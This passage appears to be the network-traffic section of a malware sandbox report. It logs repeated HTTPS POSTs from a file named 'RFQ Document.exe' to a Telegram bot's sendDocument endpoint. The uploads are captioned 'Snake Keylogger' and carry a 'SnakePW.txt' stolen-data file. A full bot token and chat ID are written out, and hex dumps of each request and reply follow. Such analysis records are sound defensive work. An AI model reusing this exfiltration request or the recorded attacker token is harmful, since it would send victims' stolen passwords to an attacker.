2021-09-28 05:58:22 UTC	11	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:22 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:22 UTC	12	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12586,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808702,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.2.4	49846	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:36 UTC	112	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cb79bc6f Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:36 UTC	112	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 37 39 62 63 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cb79bc6fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:36 UTC	112	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:36 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:36 UTC	113	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12652,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808716,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.2.4	49847	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:37 UTC	113	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cb9659fd Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:37 UTC	113	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 39 36 35 39 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cb9659fdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:37 UTC	114	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:37 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:37 UTC	114	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12653,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808717,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.2.4	49848	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:37 UTC	115	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cbae3072 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:37 UTC	115	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 61 65 33 30 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cbae3072Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:37 UTC	115	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:37 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:37 UTC	116	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12654,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808717,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.2.4	49849	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:37 UTC	116	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cbdb7cb6 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:37 UTC	117	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 64 62 37 63 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cbdb7cb6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:37 UTC	117	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:37 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:37 UTC	117	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12655,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808717,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.2.4	49850	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:37 UTC	118	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cbf3540f Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:37 UTC	118	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 66 33 35 34 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cbf3540fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:37 UTC	119	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:37 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:37 UTC	119	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12657,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808717,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.2.4	49851	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:37 UTC	120	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cc08cab5 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:37 UTC	120	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 30 38 63 61 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cc08cab5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:37 UTC	120	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:37 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:37 UTC	121	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12658,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808717,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.2.4	49852	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:37 UTC	121	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cc20a359 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:37 UTC	121	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 32 30 61 33 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cc20a359Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:38 UTC	122	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:38 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:38 UTC	122	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 38 2c 22 64 Data Ascii: 